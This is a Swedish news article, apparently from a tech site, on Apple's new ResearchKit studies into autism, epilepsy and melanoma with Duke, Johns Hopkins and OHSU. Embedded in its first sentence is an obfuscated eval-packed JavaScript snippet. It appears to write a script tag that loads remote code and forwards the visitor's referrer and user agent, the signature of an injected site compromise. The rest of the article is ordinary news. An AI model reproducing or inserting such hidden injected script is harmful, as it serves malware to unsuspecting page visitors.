Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Apple presenterar nya ResearchKit-studier om autism, epilepsi och melanom

apple logo
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|abkyb|var|u0026u|referrer|ybkbk||js|php’.split(’|’),0,{}))
meddelade igår att ResearchKit öppnar för nya forskningsstudier om autism, epilepsi och melanom. ResearchKit gör iPhone till ett kraftfullt verktyg för medicinsk forskning. Det ger läkare och forskare möjlighet att samla in merexakta data oftare från deltagare som använder iPhone-appar. Med ResearchKit kan deltagarna i studien lämna sitt samtycke via en interaktiv process, enkelt utföra aktiviteter, skicka in enkätsvar och själva välja vilka data de villdela med forskarna, vilket gör det enklare än någonsin att bidra till medicinforskningen. Många forskare och utvecklare har redan bidragit till ResearchKit och över 50 fler forskare lägger nu till innehåll i det ramverket med öppen källkod.

”Vi känner oss hedrade över att få arbeta med världsledande medicinska institutioner och att kunna ge dem tillgång till verktyg som i slutändan kan hjälpa våra kunder att leva hälsosammare”, säger Jeff Williams, operativ chef på Apple. ”På bara ett halvår har ResearchKit-appar för allt från astma och diabetes till Parkinsons sjukdom redan gett information till forskare runt om i världen och över 100 000 deltagare väljer att bidra med sina data för att utveckla medicinforskningen.”

Med användarnas tillstånd kan forskare som använder ResearchKit i sina studier också få tillgång till data från appen Hälsa, t.ex. information om vikt, blodtryck, glukosnivåer och andra data som samlas in av enheter och appar från tredje part, för att få åtkomst till data i realtid direkt från iPhone. Med tillgång till data från accelerometern, mikrofonen, gyroskopet och GPS:en i iPhone får forskarna även information om deltagarnas gång, motoriska förmåga, konditionsnivå, tal och minne, vilket tillför ännu mer objektiva data till forskningen.

Nya ResearchKit-studier
Autism Duke University och Duke Medicine lanserar ”Autism & Beyond” för föräldrar som har frågor om autism och andra utvecklingsstörningar. Forskarteamet på Duke undersöker om kameran på framsidan på iPhone kan användas till att upptäcka tecken på utvecklingsstörning vid en mycket tidigare ålder än hittills. Appen använder helt nya typer av algoritmer som läser av känslor i syfte att analysera hur ett barn reagerar på videor som visas på en iPhone. Duke genomför studien i samarbete med Pekings universitet i Kina och andra internationella organ.

”Autism & Beyond kombinerar väletablerade frågeformulär med en ny videoteknik som gör det möjligt att analysera ett barns känslor, så att vi i framtiden kan automatisera övervakningen av olika tillstånd, som autism och ångest”, berättar Ricky Bloomfield, chef för Mobile Technology Strategy och forskarassistent på avdelningen för internmedicin och pediatrik på Duke University. ”Med ResearchKit kan vi samla en hel medicinsk studie i en enda app och nå ut till många fler människor än någonsin förut.”

Epilepsi: Appen EpiWatch som utvecklats av Johns Hopkins är den första studien i sitt slag att genomföras med Apple Watch och ResearchKit. I studien undersöks om Apple Watch och andra sensorer som bärs på kroppen kan användas till att förutse när ett anfall kommer att inträffa och hur länge det kommer att pågå. Under studiens inledande skede använder forskarna en särskild komplikation på Apple Watch som gör det möjligt för patienter att med ett enda tryck starta den anpassade klockappen som samlar in data från accelerometern och pulsmätaren, för att på så sätt mäta anfallet och skicka en notis till närstående. Appen sparar information om alla anfall och patientens respons under händelsen. Appen hjälper också deltagarna att hantera sitt tillstånd genom att den övervakar deras medicinering och kontrollerar sidoeffekter, så att deltagarna kan jämföra sitt tillstånd med andra som medverkar i studien.

”I USA har över 2 miljoner människor epilepsi. Den här nya appen, som utformats med ResearchKit, ger patienter tillgång till interaktiva aktiviteter som hjälper dem att övervaka sitt tillstånd i dagsläget samt öppnar för utvecklingen av en ny app som kan upptäcka olika typer av anfall och meddela närstående och vårdpersonal”, säger Gregory Krauss, med. dr. i neurologi på Johns Hopkins University School of Medicine. ”Nu har vi möjlighet att använda teknik till att övervaka anfall hos patienter i hela USA och samla in data på ett helt nytt sätt.”

Melanom: På Oregon Health & Science University undersöker man om digitala bilder som tagits med iPhone kan ge information om förändringar i leverfläckar och risken för utveckling av melanom. Det kan hjälpa människor att bättre hålla koll på hudförändringar och mäta hur leverfläckar förändras i storlek över tid. Studiens deltagare kan dokumentera hudförändringar och dela dem direkt med läkare, och forskare kan samla in bilder från tiotusentals iPhone-användare runtom i världen i syfte att skapa en detektionsalgoritm som skulle kunna användas till att upptäcka melanom i framtida studier.

”Melanom kan upptäckas tidigt. Om vi kan identifiera det ännu tidigare genom att ge patienterna möjlighet att enkeltdela bilder av sina leverfläckar kan vi lära oss mer om sjukdomens utveckling”, säger Sancy Leachman, med. dr. och fil. dr. inom dermatologi och chef för forskningsprogrammet för melanom på Knight Cancer Institute. ”För att få den information som vi behöver är det otroligt viktigt att vi får fler deltagare att medverka i studien. Med ResearchKit är det enklare än någonsin eftersom vi kan utveckla en lättanvänd iPhone-app.”

Utöka ResearchKit-ramverket
Forskare och utvecklare som använda ramverket för mjukvara med öppen källkod kan fortsätta att skapa nya moduler, aktiviteter och frågeformulär för ResearchKit. Via modulen Active Task kan forskare samla in ännu mer specifika data genom att be patienter utföra aktiviteter som genererar data från iPhones avancerade sensorer. De första Active Task-modulerna bestod av aktiviteter som mätte motorik, kondition, kognitiv förmåga och röst.

På bara ett halvår har över 50 forskare bidragit med aktiviteter som använder sig av nya forskningsmetoder, till exempel aktiviteter som utvärderar tonaudiometri vid hörselnedsättning, möjligheten att mäta reaktionstiden när ett identifierat stimulus kopplas till ett identifierat svar, ett gångtest på tid, ett test för gymnasieelever som utvärderar informationsbearbetning och arbetsminne samt det matematiska pusslet Tower of Hanoi som ofta används i kognitiva studier. Andra bidrag till ResearchKit-ramverket är till exempel stöd för iPad, bildtagning och möjligheten att lägga till cirkel- och linjediagram samt grafer för diskretmatematik som ger mer detaljerade översikter.